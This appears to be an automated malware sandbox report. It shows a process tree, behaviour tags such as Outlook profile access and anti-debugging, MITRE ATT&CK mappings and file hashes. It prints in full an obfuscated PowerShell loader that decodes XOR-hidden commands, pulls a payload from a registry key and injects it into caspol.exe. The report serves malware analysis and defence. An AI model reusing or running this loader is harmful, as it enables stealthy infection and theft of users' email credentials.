Hu'fl0BiDAs7CaCPr4StDTo5AfFPr4li0Tr4Pa2Om4Ta5Co4Sk0De4Za7Dr4StEMa5RoAtw4bo5Me5KoBMe4CaCSn0Ro7Pa6SaDSp4PlCRu4MeFSt4Fl0Il4In7Ho4trCLi6unAYe4Vu6xe4Du7Bl5MeANu5AvDBy5SyBag5BaCLy4MaAFo5BaDIn4Ga6De5PaBCu0Ki1Sc0MiDFl7CoCSt4PrDSk5PrAFo5ErDUd4Pr8Re4TrFSt4UaFAd4ReCFr5TvBBl4MaCDe1MeFCe0Le5Ra0Nr9Pr7Di2Vo7JeAPo5Ge0Pu5ReAIr5HoDPr4BaCsa4Aa4Ko0Pa7Ta7GeBUl4SpCRg4PrFSt4Bu5fu4foCSk4FlABo5PaDMa4Me0So4Fo6co4Lo7To0Ob7Un6PoATm4Le8Bv4Ru5fo4Bo5An4To0Un4Ti7Sq4SlEbl6ReARo4St6St4bl7Lu5ThFRe4UnCLs4To7Sy5GrDMy4Ka0Ea4Ly6Do4Ja7Ar5PaAAl7Fi4In1Me3Sv1An3Ej7UnADi5UpDUd4St8mo4Ru7Ny4GiDFo4Ak8Ag5LaBYu4OsDna0Fo5Xe0An9Du0SwDRo6BaFAr4Do6Un5BeBSt4Ta2fu4Er5Je4maCEj4De3Bl4Es7va4NeCAl4La5Ma5SmALy4SuCSh4Ko7Ha5AdATo0Ek0La0Li7To7TaACe4ChCFr5GaDbo6Ku0Va4He4Ed5Ce9Se4Zo5Ag4LaCCh4Co4Be4BuCSt4Sk7Te5SuDQu4Re8Ui5StDUg4Gr0Co4Sy6Di4Fo7Ba6saFLi4gr5An4Al8Ek4faERa5BeAPu0Ov1Bd0TrDUn7OvCRe4riDSu5CeABo5poDPs4Pr8re4MaFEx4DiFCh4JiCUn5StBLi4UnCLo1SaEAl0Ob0Un'Sk;Ar&Sm(Vi`$KlhOmaForSilKaeSaqFruHeiStnStiBlcQu7Ti)Ag Ac`$DiSPoyUdnCoeThcKoiLaoFiuMesOv3Po;Hy`$CrSInyXanSkelocOriFloAfuHasDi4Ar Di=Fa EvHTrTPsBKo Sn'Bi0VeDSw7AdCTo4MuDMa5FoFDi4Ho0Se4Pr2Bi4Om5An4Un0Sa4le7Co4SpELi5BaAMu4Fe5Bu5StBNo4KiCSe0St7Ku6HoDPe4NoCSp4WhFCo4Un0Dv4Ce7Sc4SkCCo6St4Ri4BiCPo5KaDIv4Ro1On4Pu6Ko4BaDPs0La1Kl0StDco4Fr1Sq4Sk8At5SlBAu4pe5Mi4SeCNi5Pe8Yp5SvCIs4Yn0be4Ko7Te4Fa0Ob4InAsa1SoBSt0Re5Af0Se9ma0HjDEf4Sl1Ca4St8Pa5KiBEn4Va5se4GrCOx5Li8Tr5OuCCr4Ga0Lo4Tf7Kl4An0La4BaAUn1GrAEx0Be5Su0Kr9Bl0VaDPr7NyCKa4Ha7Sy5FoEFa4TaCEs4To8Hn5RoBhe5Ry0Gi0Em5Un0Di9Ma0coDTa6BaFUn4Or6Ga5OvBUd4Fa2Mo4Un5St4GeCmi4Pl3Tj4Fa7To4DeCSt4Ef5pr5GuAEx4ElCIn4De7Ly5HaATi0na0Ge0Ap7Vi7TrAci4elCAm5JaDMe6ha0Ta4Un4Pr5Ok9Ce4St5My4SaCPs4Br4Vi4IdCGa4Bl7Lu5FlDMo4Tr8Tu5PrDAu4Re0Re4Hy6Sk4Vi7La6LeFEs4vo5Li4Er8An4ToEPr5UmAEl0Sk1No0UnDIn7KoCVa4DiDVa5lyACo5VaDVa4Ba8Ti4BiFFl4PsFEk4TrCSc5AgBOb4RaCNo1PeETe0De0Ho'Jo;Ch&Is(Be`$AlhBladarLalEceEmqUbuGuiMinOriMocCo7Br)Av Ag`$baSThysenBueBecRuiTooSluCasfi4Lu;Fr`$ArSkoyAsnBaeTecEriTjoSkuDesCo5Su Ri=Se FiHCrTGaBAr Ag'pa5RaBBr4StCSy5CoDSn5JoCPr5foBFl4Pa7De0Mi9Fo0StDRe7LaCGo4ApDAb5KrFRa4In0Al4Me2Sa4Fu5Sa4co0Au4He7Al4BoESk5PlAUd4Kr5su5SlBBe4TeCRe0Ni7Hy6TiAAn5AfBDi4BaCFa4Sp8Wi5ZoDAf4NaCBu7suDCo5Sk0Fu5Ra9Gu4BrCGt0Sa1Cr0In0An'To;Di&Re(In`$ErhtoaUdrReldaeBiqNyuSaiTonPhiSicro7De)Cr So`$ViSKrysinDeeGrcFaiTroNouYdsUd5Gl Br Ba Ru;En}Le`$ArCprhReaPenPlcUneHadTe In=Cy KoHBaTStBHe Te'He4Ru2my4TrCfe5PaBbu4Me7Co4TrCCr4Ur5Ra1FeAGr1FyBHa'Tr;Hu`$ViSSeyPenKoeMacLaiOnoAruFasBl6Sl Sk=Ba ApHTrTSpBFo Dd'En0IcDRi6Be8Ad4PrFSh5FaAAk5MaDan4Lu8Fr4Me7Ns4peDSe5GrAAn4Bu4Re4In8Da4El8su4Mo5Te4DiCAc5DiBSc4AfCEr5PrAIn0Lo9Mn1Us4Ox0Zu9fa7ge2cr7KnAPe5Na0Ag5TaAbo5EpDIn4StCUd4Ar4Un0Of7En7ReBKo5StCMa4Ro7Li5AtDpr4Re0Ta4Af4Be4ReCBa0Ve7Ld6Pi0Ko4Sk7Su5AnDfi4ReCTi5MoBKv4Un6Bu5Ko9hj7OvABr4BiCSi5LyBGa5beFAt4By0In4SkACo4LoCFo5UnAAl0Ke7De6He4mi4Gi8Gi5ToBCe5HuADe4pl1Ag4Or8Al4Ka5Ku7Kl4Tr1Fu3Ro1Cl3Ko6MoEHe4AkCRe5SvDLi6BrDTr4DeCYa4Dy5Ek4SpCEn4UhERo4St8Ba5CoDGu4CaCun6ElFIm4no6Sa5TrBRe6SuFRe5ReCYo4Co7Sc4HeAHj5maDSp4Ti0he4Wi6Tu4ou7Ru7Un9Ne4Ha6Zo4Pr0So4Ch7Va5PoDBr4chCCo5SuBRa0Ya1Sa0Tr1Ea4StFSk4Am2bl5Jo9So0Po9Af0MoDIn6udASa4sk1Ru4Di8Ho4St7Ta4DiARi4AnCta4PhDcl0Av9Sg0lsDMo4Ti1So4Al8Sv5EpBTe4Em5Di4ChCDi5Se8Sp5UnCRe4Gu0Fo4Se7Be4Gr0Ka4ShASk1MoDsa0Na0Be0Wi5In0Ra9Bu0Ve1ru6PlESt6anDLi7JeDUn0Su9Pe6Af9Su0sa1Ur7Sm2Op6Be0Ka4Am7Ha5CaDTr7Pi9He5SaDFl5AuBSh7Sl4Br0Tr5Ch0Do9Es7ve2St7SkCTe6De0Dr4Tr7Ta5InDRi1LuADe1spBCe7Re4Ac0Ch5Sk0Bi9Zo7Pr2Ov7OvCPa6Pe0Ba4Sv7Kl5TrDMa1EnATr1KoBRe7su4Si0Sp5sk0Hj9Sl7Vi2Ol7PrCTi6Sk0Un4Ga7Fo5ExDAr1poASt1KoBNo7Di4Pr0St0Aa0Un9Sk0Sa1Bl7Gr2Ma6St0Ny4Sa7Pa5AnDDe7Sp9Wo5OmDSn5UdBWa7Ly4Ap0Co0Wi0Be0Va0Fe0so'Ca;Hu&sk(in`$TrhGraThrMelAlePrqDauBaiStnMoiSpcAl7au)Un Ou`$DiSSuyWhnKleSpcAriprobauFjsZe6Wa;dk`$DoBunrGgyFadAneSakImaLemMupEneStnSmsaf Te=No HafMekTepun Pr`$BlhUnagurThlGeeFaqSkuUdiCanBeiAtcBi5sc Ak`$BahBlaBirPllmoeBeqKuuFliAdnSoiHacCa6Se;No`$InSApyRinRaeStcSyiMioKbuInsFr7To Ba=Di TaHAaTWaBKa Mi'Ma0StDdo6biDNi4Ca0St5DiAde4Br8ki4MoBDu4Sv0Sa4Qu5er4Ol0Eu5ReDLy5At0Tu1AnEva1hiDUn1UnATi0Do9Ba1Gu4Br0Fo9Ca0ChDPl6Dr8Tr4KoFPh5GoAPo5usDSk4Bl8Fr4No7Be4RhDKo5OxASk4Aa4Ud4Mo8Mi4Ov8Sk4Ty5mi4GaChe5SiBSa4ReCIs5NyAGa0Sk7Ly6No0Az4Ce7Sn5AfFIn4ve6Pr4vo2Pi4SuCMi0Pa1Te7Tu2Fo6li0Bl4Jo7Dd5MoDRu7Ti9Gl5StDRi5exBNe7Mo4Me1Re3pa1De3Pa7Sp3Un4MoCSw5NeBEr4Ne6Ej0Se5Ad0Fe9An1ReFFj1ScFPr1AfEUh0Cl5is0Ho9Bi1Li9Al5Sy1Kn1PlAHo1Fo9Sk1Ho9Su1Ne9By0Ar5Sy0Fl9Rh1Da9Bl5Ca1fa1NoDRe1Sp9Vr0Ta0Fu'Hv;Be&Te(Gr`$LahPhaPorsolMeeJaqInuPeiConStiDecUn7Hj)Ku Ph`$inSPlyPanDoeBecMiiCooFiuSvsPr7re;Pr`$PaSEuyPhnUnesocVoiBroHeuInsSu8Ae Su=Kr CoHCoTVaBTr Au'Sl0WhDSt6Aa7Pa4SeCSu5UnDGa4Gr8Pa0Co9Li1Gn4Di0Ar9El0SoDEl6Bl8Is4SuFac5AtAAn5TaDCl4Fl8St4Ju7Ta4ReDPr5SaAun4Po4Ba4Ac8Mi4st8Be4Sp5Pl4UdCRe5ViBtr4AnCIn5OvARi0Le7Sa6Tj0Me4Gr7Pa5CeFMi4Jo6Bi4Re2Ma4CaCOv0An1Mu7Bi2Sp6Dy0Ga4Up7Be5duDSt7So9Un5TeDex5PtBOp7Sy4Ep1Sp3Ca1Sk3Hy7ge3Fa4CaCPe5RiBNe4In6In0Se5Vo0Sk9In1MeABa1AfDRh1UdCLy1piDDo1UnCDi1PrFOp1AfFBi1ImDHe0Sp5Re0Pa9Uo1Ti9Fe5Em1Xe1FoAMj1Ac9Al1ve9Br1Un9Un0Su5Hv0Pl9Fo1Ci9Be5Di1Te1DiDSt0Be0El'Be;Pt&La(Ga`$LyhDraPirChlSaeplqBluStiNonPriFocLs7Bi)Be Ma`$AfSfoyOanMieBlcReiSeoskuGgsVa8Ra;Zo`$StUBenRedZeeMotEgeVecTatRoaVebKulPeyHe=Dr(UdGReeAktOv-ZoISctrsememAnPDarEcoDopKleDerIntBoyBo Sp-BlPJoaTrtDehFe He'InHSpKStCUnUCo:Ud\SkXJowDe\StSZotZyeSkmInnVeiBlnSegSusPlmNotVitCoeTetRo'Ko)Wh.TrUhypVilSuiEjfDotFlePidAfnNdeCosUnsSp;Fi`$deSSpySinKrecucChiFooKauFisIr9Rr pr=Pa reHPrTfeBAf Bi'Un0PoDFr7scAOv5Pi0Gy4St7Ma4InCHo4FoARe4Fl0Ri4Vs6Ov5SqCKr5LuASu0An9bl1Sl4Hj0un9Be7pr2Ro7GrAUn5Da0Un5UnASh5ViDSc4JuCAl4la4Ko0Un7Ta6DiAFe4Co6Va4ri7Tn5HeFCi4TaCde5KaBRv5DuDFe7Om4No1io3Bl1Ed3Se6TaFUn5UnBEn4et6Kn4Tr4Mo6UnBci4sa8Pr5biARi4AfCCa1NaFNi1EcDBe7FlAno5KrDTu5UdBSn4Pa0Sc4Ch7br4RuEFr0Be1Cu0DoDKa7MuCCa4lh7Ur4DrDFi4unCEn5AsDBe4ExCop4UdASa5FoDMo4Ce8He4ImBSa4Se5Bl5No0se0Sp0Ve'Ni;Tr&De(Co`$ruhSoaGrrfrlUneAfqNouPriAknUniBacLy7Sc)Wa Sv`$ReSMoyTrnAeeUdcBaiProOpuBasBa9Po;su`$FrUEnnradsueMatDreNocSutAkaFubPrlRayNa0Un Ha=St ArHOvTWaBPe Be'Be7Di2Br7FeARu5Sp0Lu5TuAPe5KyDOb4HiCKa4Al4Le0Mu7Fo7TeBSn5NeCPe4Ro7Un5MoDHe4Em0Af4Cr4Un4LnCst0Re7Na6Fi0Gr4Ra7Ty5MiDAf4TeCAv5PrBPa4Er6Ba5re9Fe7NoABa4FiCPo5PrBTr5DiFBr4Ln0Se4PoADj4DiCSp5BlANd0Sk7Fr6Re4Af4No8Bo5SyBIs5PeABr4En1Na4Su8Se4Te5Pr7Nl4Sk1In3Af1fg3Ov6TeAau4Tr6Ov5Ga9Po5Se0St0Re1Sh0UnDFa7StACo5Be0Mu4Cl7Sa4DiCPr4toAAu4Gu0Ko4Af6Ka5beCMy5FiANo0Me5Re0Le9Po1Ke9Fo0Ry5To0Ch9Fl0Os9Au0ArDFu6HeDSo4Bo0Qu5ExATe4Eu8Ha4NeBHy4By0Al4Ju5In4Om0In5SpDSp5Be0Ud1DeEGr1MiDSu1PrAUn0Al5Vu0Wa9ma1FaFHe1SpFQu1ReEme0Sh0An'Ud;St&In(Re`$dehWeaFjrColTheUnqDauBaiNoniniOvcOp7pr)Br Pl`$CiUOpnMadOreSutMaePicHitTeaTebAflPuyLi0Ud;Af`$UbMFriBunFrdMosPltAfePrhBrjPodFoeCr2Li0Cr2Po=Se`$frSOpyEcnPreAicSuiTroStuBosFo.PrcPsoGluGunDytCh-Sa6De6Fl7Pr;Ma`$ReUMenTadReePhtIneFocSutteaFibstlGuyWa1Fo ch=Re CoHSeTStBBa Fe'Mo7So2Si7PuAIn5At0Ba5FyATv5EmDEf4EfCBe4Su4co0Me7Pr7UdBRa5daCCl4Bo7Ar5LeDAk4An0re4Fa4Fi4LuCPa0Sk7Ov6Po0fi4So7Tv5ThDka4NeCUn5RaBRe4Ti6Ca5Pu9Pa7FoAhv4DeCTa5HaBTe5AfFFl4Ce0Ti4BeAAa4KoCKn5StAVi0Ot7To6Fo4Fo4Ov8Re5keBHe5duABe4Fo1Di4he8Ha4Un5Me7By4Na1Gy3En1Mo3Si6CoACh4Sa6Br5No9As5vi0Ta0kr1yu0PaDGe7SiAse5Fl0Ir4Fo7Sa4TeCEx4SiAMa4sy0Ha4Li6Fi5ReCEf5UdAGa0Me5Po0Br9Em1StFDo1UrFUd1ViESk0Pr5Re0Ud9Bi0ViDLi6Fo7Lu4MeCDa5PrDKa4Kr8Bu0Ek5Fi0En9Ov0ViDTv6Ud4Un4sl0In4Pe7fu4SuDMe5SqAst5CoDSn4efCGw4De1Li4un3do4PeDIn4AgCHo1raBZo1De9Sy1PaBSh0Ch0Gy'Sh;st&Sn(Un`$GehDiaTurWalCheTeqMeuDaiAfnFoiPecUd7Fo)Ta Hs`$meUMenSkdBreRatLaeTecUrtSoaKabExlEnyTy1Ch;Su`$auUInnredAneFrtBoeNucJatneaDebVilCayOf2si To=Ou StHOrTbaBPl Un'Fi0ofDKa6So1Ho5Re0Na5Si9Sp4HoCBr5GeBKu5CoDDi4GoCOm4id7Wi5AnASa4HyCRe4un7Do4IsCBa5MoAEn5FoABe0Re9se1Pu4Cl0en9Tr7Hu2Sk7TuAHi5Ko0Re5FlATi5PrDUt4MeCPo4Fl4Be0Pe7Mo7EnBDo5TiCLa4At7Te5UnDtu4Uf0Ar4At4Ma4GiCAu0sm7Vi6St0Ch4St7Be5AfDFr4StCKl5HaBtr4Fu6Os5Pu9Ku7MaANo4TeCUt5irBLa5NoFFr4Er0En4MiAMi4BrCSt5ChAAm0Di7Ej6An4Ma4Ud8Sl5SpBCl5SkAKl4af1Le4fl8Fa4Un5De7Am4Ka1Ol3Vi1Un3Bu6BlEFo4PhCOo5SeDUf6GeDFj4KrCAf4Lo5Op4SpCUd4SoETa4ed8Lo5PrDHy4RaCSk6amFSn4Ta6Lo5UnBBy6DoFMo5SuCGe4De7La4MoAVi5DoDch4Sr0Pe4el6Wo4Ch7No7Un9Ar4Is6Pr4Su0He4Fa7Ud5TeDCo4InCRo5pdBFr0Tr1Ha0Kr1Ta4JaFIn4Su2Gr5Fa9Sa0in9Op0WoDSu6AfEBo5SmBGe4ShCCo4St4Li4St0Um4Af6Fi0Je9No0maDUs6Gl4Kr4Ta0Da5SmABo5ApDLa5PrCWh5oxDZu4Ze6jo5TeBRm5GeAAk0Th0De0Lt5Up0jo9Fj0Ma1Ch6OsEsw6NaDTi7EmDMa0An9Ud6Fa9Vi0Ba1ba7Sc2sy6Eu0Is4pe7Un5InDSn7En9Ko5CaDAh5UdBFr7Hy4In0Pr5Ny0Gr9Ut7Em2Aa6Ph0Sl4Ad7Ma5MeDLa7Bl9co5AlDDa5SmBsh7Op4re0Ac5Ju0Tr9Be7No2Ma6Ho0Sd4Se7Za5miDOv7Se9Er5miDTr5ClBRo7Un4Om0Fe5Ud0Fa9Pi7Pu2Ho6Ka0Ps4Ju7Ap5DoDSh7Fo9Pr5WaDAn5PeBLa7Gu4Cr0In5Sp0li9Me7Up2Mo6Bu0ud4Vi7Sa5ubDTr7Va9Hu5ScDda5UdBAr7in4Un0Al0Gr0No9Lo0Aa1Br7St2Fi6Fo0an4Ko7Re5NeDVa7Vo9no5HiDVi5GaBHe7Pr4Fr0Co0Pr0As0Mi0Fa0An'sl;Fr&Ka(Re`$OvhDeaStrEclAfeEnqsyuuniLgnReiAfcPa7or)Ko Wi`$skUAmnShdStebltRieTrcYutEnatibEslBuyPr2Fr;Ro`$BiUEtnFrdIlevetOueSacUdtcaaCabBilMoyFa3Po Bl=Bu MaHTeTKoBBa Du'Se0DeDAl6Pa1Mi5Ri0Al5Gr9Vi4alCNo5BaBEu5DoDFl4CaCWi4Rn7Sp5FaAJa4RiCSn4Si7Fi4brCAa5LoAEr5FoAOv0It7Is6Fi0Hu4Ot7So5SlFUd4Af6De4Ar2Ph4AbCVa0cl1mo0trDWi6SmDBo4Do0Hi5StATh4Af8Fo4faBMi4Le0Le4Hi5Ek4Ov0Sj5PrDmo5Aa0Wa1SmEfo1BuDIt1YpACu0Di5No0VkDpe6Ta7Dw4WaCRh5SlDAd4Pa8Re0Af5Ti0QuDBe6SkBUn5ReBSo5Ug0Ra4FrDTr4SoCHa4Tr2Sk4No8Ko4Op4St5Ba9In4SiCSe4Wh7Op5GeARa0Bi5St1he9Fa0Ba5Sa1ou9Bo0Be0Ve'Se;Fo&Ka(Ma`$DehDoaRerTelReeClqFluAfiUnnnaiNocTh7Mi)Re Br`$HoUConRadOveBatGreFrcRotfoaAfbMelMayDi3He#Ho;""";;Function Undetectably9 { param([String]$Emboweller); $Paramese = $Emboweller.toCharArray(); For($Plutarchian=2; $Plutarchian -lt $Paramese.count-1; $Plutarchian+=(2+1)){ $Keat = $Keat + $Paramese[$Plutarchian]; } $Keat;}$Iserite0 = Undetectably9 'TiImanBrvUdoCukMeeMe-TrEFaxSlpOlrFoeUlsansWeiflobrnSt ';$Iserite2 = Undetectably9 'GisGotPraGirCetRe-TrjVroGobKe ';$Iserite1= Undetectably9 $Buncombes;;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Iserite1 ;}else{&$Iserite0 $Iserite1;};;;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:856

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Twistily00 {param([String]$Emboweller);For($Plutarchian=2; $Plutarchian -lt $Emboweller.Length-1; $Plutarchian+=(2+1)){$Keat = $Keat + $Emboweller.Substring($Plutarchian, 1);}$Keat;}$Twistily02 = Twistily00 'PrIEknEpvTaoCakFleRe-BuECrxRepElrAfeRosEfsPaiCaoPrnWe ';$Twistily01 = Twistily00 'Ba$JePSkePizLriDezTsiChfKuoChrLamNo[Rn$RePInlfruBotBaaAnrKlcSthAsiSuaUnnRr/Al2un]De Ma=Ho Vi[StcGloFanDivPoekurRetCo]Lb:Ch:AgTAnoFiBSeyGatFjeLe(Li$BaEHemPubLaoTowFoeNolLilUdeMarSa.SkSReubrbmesSltSkrDiiDrnRugKd(Fj$BePOnltiuTatStaJerRucNohSciNeaOcnCa,Fu Sk2Do)Hi,Zi Fl1In6In)Am ';Function HTB {param([String]$Emboweller);$Peziziform = New-Object byte[] ($Emboweller.Length / 2);For($Plutarchian=0; $Plutarchian -lt $Emboweller.Length; $Plutarchian+=2){.($Twistily02) $Twistily01;$Peziziform[$Plutarchian/2] = ($Peziziform[$Plutarchian/2] -bxor 41);}[String][System.Text.Encoding]::ASCII.GetString($Peziziform);}$Udstaffere0=HTB '7A505A5D4C44074D4545';$Udstaffere1=HTB '64404A5B465A464F5D077E40471A1B077C475A484F4C67485D405F4C644C5D41464D5A';$Udstaffere2=HTB '6E4C5D795B464A684D4D5B4C5A5A';$Udstaffere3=HTB '7A505A5D4C44077B5C475D40444C0760475D4C5B46597A4C5B5F404A4C5A076148474D454C7B4C4F';$Udstaffere4=HTB '5A5D5B40474E';$Udstaffere5=HTB '6E4C5D64464D5C454C6148474D454C';$Udstaffere6=HTB '7B7D7A594C4A4048456748444C050961404D4C6B507A404E0509795C4B45404A';$Udstaffere7=HTB '7B5C475D40444C0509644847484E4C4D';$Udstaffere8=HTB '7B4C4F454C4A5D4C4D6D4C454C4E485D4C';$Udstaffere9=HTB '6047644C44465B5064464D5C454C';$harlequinic0=HTB '64506D4C454C4E485D4C7D50594C';$harlequinic1=HTB '6A45485A5A0509795C4B45404A05097A4C48454C4D050968475A406A45485A5A0509685C5D466A45485A5A';$harlequinic2=HTB '60475F46424C';$harlequinic3=HTB '795C4B45404A050961404D4C6B507A404E0509674C5E7A45465D05097F405B5D5C4845';$harlequinic4=HTB '7F405B5D5C4845684545464A';$harlequinic5=HTB '475D4D4545';$harlequinic6=HTB '675D795B465D4C4A5D7F405B5D5C4845644C44465B50';$harlequinic7=HTB '606C71';$harlequinic8=HTB '75';$Gremio=HTB '7C7A6C7B1A1B';$Mistutors=HTB '6A4845457E40474D465E795B464A68';function fkp {Param ($skrmet, $Paque221) ;$Synecious0 =HTB '0D65485C474A4159484D1109140901726859596D46444840477413136A5C5B5B4C475D6D4644484047076E4C5D685A5A4C444B45404C5A01000955097E414C5B4C04664B434C4A5D0952090D76076E45464B4845685A5A4C444B45506A484A414C090468474D090D760765464A485D404647077A5945405D010D41485B454C585C4047404A110072041874076C585C48455A010D7C4D5A5D484F4F4C5B4C1900095400076E4C5D7D50594C010D7C4D5A5D484F4F4C5B4C1800';&($harlequinic7) $Synecious0;$Synecious5 = HTB '0D67484B464E5B5C474D4C474C5A0914090D65485C474A4159484D11076E4C5D644C5D41464D010D7C4D5A5D484F4F4C5B4C1B0509727D50594C7274740969010D7C4D5A5D484F4F4C5B4C1A05090D7C4D5A5D484F4F4C5B4C1D0000';&($harlequinic7) $Synecious5;$Synecious1 = HTB '5B4C5D5C5B47090D67484B464E5B5C474D4C474C5A0760475F46424C010D475C454505096901727A505A5D4C44077B5C475D40444C0760475D4C5B46597A4C5B5F404A4C5A076148474D454C7B4C4F7401674C5E04664B434C4A5D097A505A5D4C44077B5C475D40444C0760475D4C5B46597A4C5B5F404A4C5A076148474D454C7B4C4F0101674C5E04664B434C4A5D0960475D795D5B000509010D65485C474A4159484D11076E4C5D644C5D41464D010D7C4D5A5D484F4F4C5B4C1C00000760475F46424C010D475C4545050969010D5A425B444C5D0000000005090D7948585C4C1B1B180000';&($harlequinic7) $Synecious1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Forklejnelsens,[Parameter(Position = 1)] [Type] $Unweary = [Void]);$Synecious2 = HTB '0D7C4D5F40424540474E5A455B4C091409726859596D46444840477413136A5C5B5B4C475D6D4644484047076D4C4F40474C6D50474844404A685A5A4C444B45500101674C5E04664B434C4A5D097A505A5D4C44077B4C4F454C4A5D40464707685A5A4C444B45506748444C010D7C4D5A5D484F4F4C5B4C1100000509727A505A5D4C44077B4C4F454C4A5D404647076C44405D07685A5A4C444B45506B5C40454D4C5B684A4A4C5A5A7413137B5C4700076D4C4F40474C6D50474844404A64464D5C454C010D7C4D5A5D484F4F4C5B4C1005090D4F48455A4C00076D4C4F40474C7D50594C010D41485B454C585C4047404A1905090D41485B454C585C4047404A180509727A505A5D4C4407645C455D404A485A5D6D4C454C4E485D4C7400';&($harlequinic7) $Synecious2;$Synecious3 = HTB '0D7C4D5F40424540474E5A455B4C076D4C4F40474C6A46475A5D5B5C4A5D465B010D7C4D5A5D484F4F4C5B4C1F0509727A505A5D4C44077B4C4F454C4A5D404647076A48454540474E6A46475F4C475D4046475A7413137A5D48474D485B4D05090D6F465B42454C43474C455A4C475A00077A4C5D604459454C444C475D485D4046476F45484E5A010D7C4D5A5D484F4F4C5B4C1E00';&($harlequinic7) $Synecious3;$Synecious4 = HTB '0D7C4D5F40424540474E5A455B4C076D4C4F40474C644C5D41464D010D41485B454C585C4047404A1B05090D41485B454C585C4047404A1A05090D7C475E4C485B5005090D6F465B42454C43474C455A4C475A00077A4C5D604459454C444C475D485D4046476F45484E5A010D7C4D5A5D484F4F4C5B4C1E00';&($harlequinic7) $Synecious4;$Synecious5 = HTB '5B4C5D5C5B47090D7C4D5F40424540474E5A455B4C076A5B4C485D4C7D50594C0100';&($harlequinic7) $Synecious5 ;}$Chanced = HTB '424C5B474C451A1B';$Synecious6 = HTB '0D684F5A5D48474D5A444848454C5B4C5A091409727A505A5D4C44077B5C475D40444C0760475D4C5B46597A4C5B5F404A4C5A0764485B5A4148457413136E4C5D6D4C454C4E485D4C6F465B6F5C474A5D404647794640475D4C5B01014F4259090D6A4148474A4C4D090D41485B454C585C4047404A1D000509016E6D7D0969017260475D795D5B740509727C60475D1A1B740509727C60475D1A1B740509727C60475D1A1B740009017260475D795D5B74000000';&($harlequinic7) $Synecious6;$Brydekampens = fkp $harlequinic5 $harlequinic6;$Synecious7 = HTB '0D6D405A484B4045405D501E1D1A0914090D684F5A5D48474D5A444848454C5B4C5A0760475F46424C017260475D795D5B741313734C5B4605091F1F1E050919511A191919050919511D1900';&($harlequinic7) $Synecious7;$Synecious8 = HTB '0D674C5D480914090D684F5A5D48474D5A444848454C5B4C5A0760475F46424C017260475D795D5B741313734C5B4605091A1D1C1D1C1F1F1D050919511A191919050919511D00';&($harlequinic7) $Synecious8;$Undetectably=(Get-ItemProperty -Path 'HKCU:\Xw\Stemningsmttet').Upliftedness;$Synecious9 = HTB '0D7A50474C4A40465C5A091409727A505A5D4C44076A46475F4C5B5D7413136F5B46446B485A4C1F1D7A5D5B40474E010D7C474D4C5D4C4A5D484B455000';&($harlequinic7) $Synecious9;$Undetectably0 = HTB '727A505A5D4C44077B5C475D40444C0760475D4C5B46597A4C5B5F404A4C5A0764485B5A4148457413136A465950010D7A50474C4A40465C5A0509190509090D6D405A484B4045405D501E1D1A05091F1F1E00';&($harlequinic7) $Undetectably0;$Mindstehjde202=$Synecious.count-667;$Undetectably1 = HTB '727A505A5D4C44077B5C475D40444C0760475D4C5B46597A4C5B5F404A4C5A0764485B5A4148457413136A465950010D7A50474C4A40465C5A05091F1F1E05090D674C5D4805090D6440474D5A5D4C41434D4C1B191B00';&($harlequinic7) $Undetectably1;$Undetectably2 = HTB '0D6150594C5B5D4C475A4C474C5A5A091409727A505A5D4C44077B5C475D40444C0760475D4C5B46597A4C5B5F404A4C5A0764485B5A4148457413136E4C5D6D4C454C4E485D4C6F465B6F5C474A5D404647794640475D4C5B01014F4259090D6E5B4C444046090D64405A5D5C5D465B5A000509016E6D7D0969017260475D795D5B7405097260475D795D5B7405097260475D795D5B7405097260475D795D5B7405097260475D795D5B740009017260475D795D5B74000000';&($harlequinic7) $Undetectably2;$Undetectably3 = HTB '0D6150594C5B5D4C475A4C474C5A5A0760475F46424C010D6D405A484B4045405D501E1D1A050D674C5D48050D6B5B504D4C424844594C475A0519051900';&($harlequinic7) $Undetectably3#"
3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1732

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
4⤵
- Checks QEMU agent file
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1796

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
61KB

MD5
fc4666cbca561e864e7fdf883a9e6661

SHA1
2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5

SHA256
10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b

SHA512
c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
342B

MD5
9bb9d2ac5fb1c700d04635c376ce765a

SHA1
5206da82540dcff241e7f1953f806166ee2f6daa

SHA256
5c6333f228926d0e94ac1d509370e8ce78e2431d5c0337d8c01f348fbafa82c3

SHA512
3df2a29fae74e258cd06aa00833b90a6d4d8445e3d501179e46a1c436dd16e68a016e08451e16c71c7eea396b6c263d498c10af04a8b9cd87687d9f4e690791f

Download Submit
memory/856-62-0x00000000023DB000-0x00000000023FA000-memory.dmp

Filesize
124KB

Download
memory/856-58-0x000007FEF3020000-0x000007FEF3B7D000-memory.dmp

Filesize
11.4MB

Download
memory/856-89-0x00000000023DB000-0x00000000023FA000-memory.dmp

Filesize
